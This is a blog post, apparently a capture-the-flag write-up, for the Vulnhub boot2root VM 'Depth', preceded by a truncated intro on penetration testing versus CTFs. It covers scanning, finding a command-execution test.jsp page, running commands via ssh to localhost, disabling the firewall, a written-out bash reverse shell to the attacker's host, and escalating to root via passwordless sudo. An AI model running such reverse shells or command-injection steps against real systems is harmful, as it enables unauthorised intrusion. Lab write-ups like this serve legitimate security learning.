A Dive into the Nuances of Penetration Testing vs Capture the Flag Challenges

Introduction Embarking on a journey into the dynamic world of cybersecurity, at some point, you'll inevitably encounter the terms of Penetration Testing and Capture the Flag (CTF) challenges. This post aims to unravel the intricate differences between these two domains, shedding light on the nuances and hopefully making things just a bit clearer and more distinctive. Let's jump into it. Understanding the Objectives At its core, penetration testing is a meticulous and systematic endeavor to uncover and exploit vulnerabilities within a targeted system, network or application. Unlike the clandestine nature of real-world attackers, penetration testers operate with explicit consent, allowing for a comprehensive evaluation of an organization's security posture. The overarching goal is to emulate genuine threats, providing valuable insights into potential weaknesses and areas for improvement. The main and final goal is to provide the client with value, by identifying, exploiting ...
0

Depth 1 Writeup

This is the write-up of Depth, boot2root vm on Vulnhub.

First, I start as usual, with a port scan on the box.

# Nmap 7.50 scan initiated Fri Dec 22 16:07:55 2017 as: nmap -A -T4 -sV -p- -Pn -n -v -oA full 192.168.1.76
adjust_timeouts2: packet supposedly had rtt of -1293499 microseconds.  Ignoring time.
Nmap scan report for 192.168.1.76
Host is up (0.00087s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:3E:AD:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Uptime guess: 38.020 days (since Tue Nov 14 15:48:53 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.87 ms 192.168.1.76

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 22 16:17:55 2017 -- 1 IP address (1 host up) scanned in 600.27 seconds

As can be seen by the scan, only one port open, 8080. Navigating to that port, presents what looks like a default installation of tomcat, with certain files removed.

Moving on, I decide to go with some dirbusting on the server, see if there are any interesting files.

root@kali:~/Tools/dirsearch# ./dirsearch.py -u http://192.168.1.76:8080/ -w ../SecLists/Discovery/Web_Content/raft-small-files.txt -t 20 -b -e "jsp"

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: jsp | Threads: 20 | Wordlist size: 11424

Error Log: /root/Tools/dirsearch/logs/errors-17-12-22_16-22-30.log

Target: http://192.168.1.76:8080/

[16:22:30] Starting: 
[16:22:30] 200 -    2KB - /index.html
[16:22:32] 200 -    2KB - /
[16:23:08] 200 -  573B  - /test.jsp

Task Completed

A page test.jsp was found. Let's see what this is about with a browser.

So what the page seems to be doing is, run the command that I input in the textbox (not all commands run, for example echo into files seems to not work) and then prints the output after formatting the text accordingly.

With an ls -l in /home/ I manage to get the username of the local user.

With that at hand, and after many failed attempts to try and actually run some useful commands, I notice that by piping commands in through SSH I am able to run them. For example, sudo -l doesn't seem to work, but ssh bill@localhost sudo -l runs just fine.

Even though the formatting is odd, the text returned seems quite similar to this one User root may run the following commands on kali. So it seems that the user does have some access privileged access on the system.

Taking a leap of faith and since all outbound traffic is being probably being blocked, I go ahead and disable the firewall

No output, we are going blind here, taking that leap of faith a bit forward, I run a reverse shell the same way with ssh bill@localhost bash -i >& /dev/tcp/192.168.1.86/4444 0>&1  and since the page doesn't load directly I have a good feeling about this.

At the same time on my local netcat listener

root@kali:~/Documents/ctfs/vulnhub/depth# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.1.86] from b2r.lan [192.168.1.76] 40468
bash: cannot set terminal process group (2906): Inappropriate ioctl for device
bash: no job control in this shell
bill@b2r:~$ whoami
whoami
bill
bill@b2r:~$ id
id
uid=1000(bill) gid=1000(bill) groups=1000(bill),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lxd),116(lpadmin),117(sambashare)
bill@b2r:~$

And there it is. It all worked just fine. Now let's check out what kind of access the user has.

bill@b2r:~$ sudo -l
sudo -l
Matching Defaults entries for bill on b2r:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bill may run the following commands on b2r:
    (ALL : ALL) NOPASSWD: ALL

So bill has full access as root without needing a password. That means head straight for the flag.

bill@b2r:~$ sudo su
sudo su
cd /root/
ls
flag
cat flag
flag{WellThatWasEasy}

Aaand there it is, the root flag. Thanks a lot for Vulnhub, and Dan Lawson for building this vm.

Comments

Post a Comment